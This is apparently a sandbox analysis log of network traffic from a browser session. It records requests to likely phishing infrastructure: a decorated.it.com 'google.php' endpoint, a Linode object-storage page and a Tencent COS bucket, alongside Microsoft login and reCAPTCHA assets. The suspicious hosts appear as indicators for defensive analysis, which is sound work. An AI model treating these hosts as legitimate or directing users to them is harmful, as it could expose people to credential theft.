    Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: miog.decorated.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://microcmg.jp-osa-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: miog.decorated.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: colegiojuancalvino.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: microcmg.jp-osa-1.linodeobjects.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: gmddqjzslbcuxxqboemm.decorated.it.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
    Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
    Source: global trafficDNS traffic detected: DNS query: 5963053387-1317754460.cos.ap-jakarta.myqcloud.com
    Source: global trafficDNS traffic detected: DNS query: office.com
    Source: global trafficDNS traffic detected: DNS query: www.office.com
    Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: miog.decorated.it.com
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
    Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
    Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
    Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
    Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
    Source: unknownHTTP traffic detected: POST /recaptcha/api2/reload?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 8988sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-protobuffersec-ch-ua-mobile: ?0Accept: */*Origin: https://www.google.comX-Client-Data: CLf3ygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33yAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 26 Apr 2025 18:58:13 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closex-powered-by: PHP/7.2.34content-type: text/html; charset=UTF-8content-length: 28date: Sat, 26 Apr 2025 18:58:23 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 26 Apr 2025 18:58:37 GMTContent-Type: application/xmlContent-Length: 226Connection: closex-amz-request-id: tx00000e3a7839e86c9e2f7-00680d2cdd-f6a2eead-defaultAccept-Ranges: bytes
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
